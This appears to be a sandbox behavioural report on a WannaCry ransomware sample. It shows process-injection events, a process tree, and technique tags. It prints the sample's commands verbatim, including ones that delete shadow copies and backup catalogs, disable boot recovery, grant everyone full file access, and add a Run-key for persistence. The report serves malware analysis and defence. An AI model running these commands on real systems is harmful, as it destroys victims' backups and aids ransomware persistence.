wanacryptor.execmd.execmd.exe@[email protected]cmd.exe@[email protected]cmd.exeCompatTelRunner.exe

description	pid	process	target process
PID 3984 wrote to memory of 1124	3984	wanacryptor.exe	attrib.exe
PID 3984 wrote to memory of 1124	3984	wanacryptor.exe	attrib.exe
PID 3984 wrote to memory of 1124	3984	wanacryptor.exe	attrib.exe
PID 3984 wrote to memory of 1396	3984	wanacryptor.exe	icacls.exe
PID 3984 wrote to memory of 1396	3984	wanacryptor.exe	icacls.exe
PID 3984 wrote to memory of 1396	3984	wanacryptor.exe	icacls.exe
PID 3984 wrote to memory of 3648	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 3648	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 3648	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 1768	3984	wanacryptor.exe	cmd.exe
PID 3984 wrote to memory of 1768	3984	wanacryptor.exe	cmd.exe
PID 3984 wrote to memory of 1768	3984	wanacryptor.exe	cmd.exe
PID 1768 wrote to memory of 1416	1768	cmd.exe	cscript.exe
PID 1768 wrote to memory of 1416	1768	cmd.exe	cscript.exe
PID 1768 wrote to memory of 1416	1768	cmd.exe	cscript.exe
PID 3984 wrote to memory of 2760	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 2760	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 2760	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 1396	3984	wanacryptor.exe	cmd.exe
PID 3984 wrote to memory of 1396	3984	wanacryptor.exe	cmd.exe
PID 3984 wrote to memory of 1396	3984	wanacryptor.exe	cmd.exe
PID 1396 wrote to memory of 648	1396	cmd.exe	@[email protected]
PID 1396 wrote to memory of 648	1396	cmd.exe	@[email protected]
PID 1396 wrote to memory of 648	1396	cmd.exe	@[email protected]
PID 2760 wrote to memory of 1700	2760	@[email protected]	taskhsvc.exe
PID 2760 wrote to memory of 1700	2760	@[email protected]	taskhsvc.exe
PID 2760 wrote to memory of 1700	2760	@[email protected]	taskhsvc.exe
PID 3984 wrote to memory of 3444	3984	wanacryptor.exe	taskse.exe
PID 3984 wrote to memory of 3444	3984	wanacryptor.exe	taskse.exe
PID 3984 wrote to memory of 3444	3984	wanacryptor.exe	taskse.exe
PID 3984 wrote to memory of 4000	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 4000	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 4000	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 3396	3984	wanacryptor.exe	cmd.exe
PID 3984 wrote to memory of 3396	3984	wanacryptor.exe	cmd.exe
PID 3984 wrote to memory of 3396	3984	wanacryptor.exe	cmd.exe
PID 3984 wrote to memory of 3792	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 3792	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 3792	3984	wanacryptor.exe	taskdl.exe
PID 3396 wrote to memory of 940	3396	cmd.exe	reg.exe
PID 3396 wrote to memory of 940	3396	cmd.exe	reg.exe
PID 3396 wrote to memory of 940	3396	cmd.exe	reg.exe
PID 648 wrote to memory of 2452	648	@[email protected]	cmd.exe
PID 648 wrote to memory of 2452	648	@[email protected]	cmd.exe
PID 648 wrote to memory of 2452	648	@[email protected]	cmd.exe
PID 2452 wrote to memory of 3360	2452	cmd.exe	vssadmin.exe
PID 2452 wrote to memory of 3360	2452	cmd.exe	vssadmin.exe
PID 2452 wrote to memory of 3360	2452	cmd.exe	vssadmin.exe
PID 2452 wrote to memory of 2756	2452	cmd.exe	WMIC.exe
PID 2452 wrote to memory of 2756	2452	cmd.exe	WMIC.exe
PID 2452 wrote to memory of 2756	2452	cmd.exe	WMIC.exe
PID 3984 wrote to memory of 3372	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 3372	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 3372	3984	wanacryptor.exe	taskdl.exe
PID 3984 wrote to memory of 3336	3984	wanacryptor.exe	taskse.exe
PID 3984 wrote to memory of 3336	3984	wanacryptor.exe	taskse.exe
PID 3984 wrote to memory of 3336	3984	wanacryptor.exe	taskse.exe
PID 3984 wrote to memory of 3960	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 3960	3984	wanacryptor.exe	@[email protected]
PID 3984 wrote to memory of 3960	3984	wanacryptor.exe	@[email protected]
PID 516 wrote to memory of 4192	516	CompatTelRunner.exe	rundll32.exe
PID 516 wrote to memory of 4192	516	CompatTelRunner.exe	rundll32.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1124 attrib.exe

pid	process
1124	attrib.exe

C:\Users\Admin\AppData\Local\Temp\wanacryptor.exe
C:\Users\Admin\AppData\Local\Temp\wanacryptor.exe
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:1124

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1396

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 151911557332747.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
3⤵
PID:1416

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2760

C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1700

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:3360

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:4000

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wxsrckoarcbwb464" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3396

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wxsrckoarcbwb464" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:940

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3792

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3372

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3960

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3740

C:\Windows\system32\CompatTelRunner.exe
C:\Windows\system32\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ufJg6DwkIkufZZD7.1
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\GeneralTel.dll,RunGeneralTelemetry -cV ufJg6DwkIkufZZD7.1.2 -SendFullTelemetry -ThrottleUtc -MarkersNotAllowed
2⤵
- Enumerates system info in registry
PID:4192